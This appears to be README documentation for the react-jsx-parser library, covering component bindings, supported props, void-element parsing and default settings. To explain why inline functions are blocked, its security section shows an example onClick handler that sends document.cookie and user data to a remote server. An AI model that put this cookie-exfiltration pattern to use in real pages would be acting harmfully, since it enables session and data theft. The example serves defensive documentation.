A React component which can parse JSX and output rendered React Components.
import React from 'react'
import JsxParser from 'react-jsx-parser'
import Library from 'some-library-of-components'
class InjectableComponent extends Component {
static defaultProps = {
eventHandler: () => {}
}
// ... inner workings of InjectableComponent
}
const MyComponent = () => (
<JsxParser
bindings={{
foo: 'bar',
myEventHandler: () => { /* ... do stuff ... */ },
}}
components={{ InjectableComponent, Library }}
jsx={`
<h1>Header</h1>
<InjectableComponent eventHandler={myEventHandler} truthyProp />
<Library.SomeComponent someProp={foo} calc={1 + 1} stringProp="foo" />
<Library.DataFetcher>((data) => <div>{data.name}</div>)</Library.DataFetcher>
`}
/>
)
Because
InjectableComponent is passed into the
JsxParser.props.components prop, it is treated as a known element
type, and created using
React.createElement(...) when parsed out of the JSX. You can also pass in a whole collection
of components, as shown by the
Library binding, and then access the individual items with
LibraryName.ComponentName.
Finally, a note about property bindings. The
JsxParser can handle several types of binding:
true bindings, such as
<InjectableComponent truthyProp /> (equivalent to
truthyProp={true})
stringProp="foo"
calc={1 + 1}
eventHandler={myEventHandler} (note that this requires a match in
bindings)
(item) => <p>{item.name}</p>
The component does not support inline function declarations, such as:
onClick={function (event) { /* do stuff */ }}, or
onKeyPress={event => { /* do stuff */}}
() => { return <p>This will not work</p> }
This is to prevent inadvertent XSS attack vectors. Since the primary use of this component is to allow JSX to be stored server-side, and then late-interpreted at the client-side, this restriction prevents a malicious user from stealing info by executing a situation like:
<JsxParser
bindings={{ userInfo: { private: 'data' } }}
onClick={() => {
fetch('/some/remote/server', {
body: JSON.stringify({ cookies: document.cookie, userInfo })
})
}}
/>
// Import desired set of components
import { ComponentA, ComponentB } from 'somePackage/Components'
import ComponentC from 'somePackage/ComponentC'
import ComponentD from 'somePackage/ComponentD'
...
// Load an HTML or XML fragment from a remote API
const dynamicHtml = loadRemoteData()
...
// Within your component's render method, bind these components and the fragment as props
<JsxParser
bindings={bindings}
components={{ ComponentA, ComponentB, ComponentC, ComponentD }}
jsx={dynamicHtml}
/>
Any
ComponentA,
ComponentB,
ComponentC or
ComponentD tags in the dynamically loaded XML/HTML fragment will be rendered as React components. Any unrecognized tags will be handled by
React.
Note: Non-standard tags may throw errors and warnings, but will typically be rendered in a reasonable way.
When rendering HTML, standards-adherent editors will render
img,
hr,
br, and other
void elements with no trailing
/>. While this is valid HTML, it is not valid JSX. If you wish to opt-in to a more HTML-like parsing style, set the
autoCloseVoidElements prop to
true.
// <hr> has no closing tag, which is valid HTML, but not valid JSX
<JsxParser jsx="<hr><div className='foo'>Foo</div>" />
// Renders: null
// <hr></hr> is invalid HTML, but valid JSX
<JsxParser jsx="<hr></hr><div className='foo'>Foo</div>" />
// Renders: <hr><div class='foo'>Foo</div>
// This is valid HTML, and the `autoCloseVoidElements` prop allows it to render
<JsxParser autoCloseVoidElements jsx="<hr><div className='foo'>Foo</div>" />
// Renders: <hr><div class='foo'>Foo</div>
// This would work in a browser, but will no longer parse with `autoCloseVoidElements`
<JsxParser autoCloseVoidElements jsx="<hr></hr><div className='foo'>Foo</div>" />
// Renders: null
JsxParser.defaultProps = {
allowUnknownElements: true, // by default, allow unrecognized elements
// if false, unrecognized elements like <foo> are omitted and reported via onError
autoCloseVoidElements: false, // by default, unclosed void elements will not parse. See examples
bindings: {}, // by default, do not add any additional bindings
blacklistedAttrs: [/^on.+/i], // default: removes `on*` attributes (onClick, onChange, etc.)
// any attribute name which matches any of these RegExps will be omitted entirely
blacklistedTags: ['script'], // by default, removes all <script> tags
className: '', // space-delimited classes to add to wrapper (ignored if renderInWrapper=false)
components: {}, // an object map of component tag-names to their definitions - see above
// components must extend React.Component, React.PureComponent, or be a Function
componentsOnly: false, // non-component HTML tags are allowed by default, omitted if true
disableFragments: false, // if true, React <Fragment />s will not be used.
// Note: This introduces subtle errors with regard to white-space, and is provided only for
// backward compatibility with React 15.x
disableKeyGeneration: false, // if true, rendering will not automatically generate `key` props.
// Note: This may result in the "Child elements should have a unique 'key' prop " React error.
jsx: '', // the jsx string to be parsed & rendered
onError: () => {}, // if specified, any rendering errors are reported via this method
showWarnings: false, // if true showWarnings, rendering errors are output with console.warn
renderError: undefined, // if specified, this function can be used to render errors as a fallback
renderInWrapper: true, // if false, the HTML output will have no <div> wrapper
renderUnrecognized: tagName => null, // unrecognized tags are rendered via this method
}
If your application needs to support older browsers, like
IE11, import from
react-jsx-parser/dist/es5/react-jsx-parser.min.js,
which transpiles the
acorn-jsx dependency down to ES5, and also adds additional polyfill support for code used in this package.
Note: not recommended for implementations which only support modern browsers, as the ES5 version is roughly 30% larger.